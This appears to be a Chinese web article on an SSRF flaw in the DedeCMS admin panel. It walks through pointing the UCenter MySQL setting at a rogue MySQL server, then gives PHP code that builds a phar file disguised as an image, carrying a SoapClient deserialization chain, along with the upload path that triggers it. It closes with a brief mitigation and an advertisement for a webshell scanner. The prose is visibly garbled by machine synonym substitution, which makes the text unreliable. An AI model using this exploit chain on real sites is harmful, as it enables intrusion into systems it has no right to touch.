DedeCMS 后台存在SSRF毛病
dedecms的后台存在ucenter功效,可以直接修改ucenter的设置,使网站的mysql毗连。指向我们预先结构的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git
设置之后我们就可以通过修改恶意服务端的设置来读取恣意文件。 如果读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 凭据dedecms的代码,我们可以使用soapclient内置类来结构反序列化pop链来ssrf。
class Control { var $tpl; public $dsql; function __construct(){ $this->dsql = new SoapClient(null,array(‘uri’=>’http://test:5555’, ‘location’=>’http://test:5555/aaa’)); } } @unlink(“dedecms.phar”); $phar = new Phar(“dedecms.phar”); $phar->startBuffering(); $phar->setStub(“GIF89a”.”“); $o = new Control(); $phar->setMetadata($o); $phar->addFromString(“test.txt”, “test”); $phar->stopBuffering(); ?> |
将天生的文件修改为dedecms.png,然后在dedecms上有许多地方都可以上传。上传成功之后可以从文件列表中获取到图片链接。phar://../uploads/allimg/190724/1_1529564891.png/test.txt设置完成之后,刷新就可以触发ssrf。
解决方案:
暂时解决方案
通过mysqli_options设置链接时禁用allow_local_infile设置可阻止该毛病。
或在php.ini中改设置为mysqli.allow_local_infile = Off
推荐D盾—WEB检察工具:
软件使用自行研发不分扩展名的代码剖析引擎,能剖析更为隐藏的WebShell后门行为。
引擎特殊针对,一句话后门,变量函数后门,${}执行 ,`执行,
preg_replace执行,call_user_func,file_put_contents,fputs 等特殊函数
的参数举行针对性的识别,能查杀更为隐藏的后门,
并把可疑的参数信息展现在你眼前,让你能更快速的相识后门的情形
新版特殊针对 dedecms 的{dede:php}{/dede:php}代码加入了识别!
软件加入隔离功效,而且可以还原!
若有不能识此外webshell请使用上传样本功效上传给我们,我们将后期加入识别!
下载:http://www.d99net.net/down/WebShellKill_V1.4.1.zip
织梦楼 » DedeCMS 后台存在SSRF毛病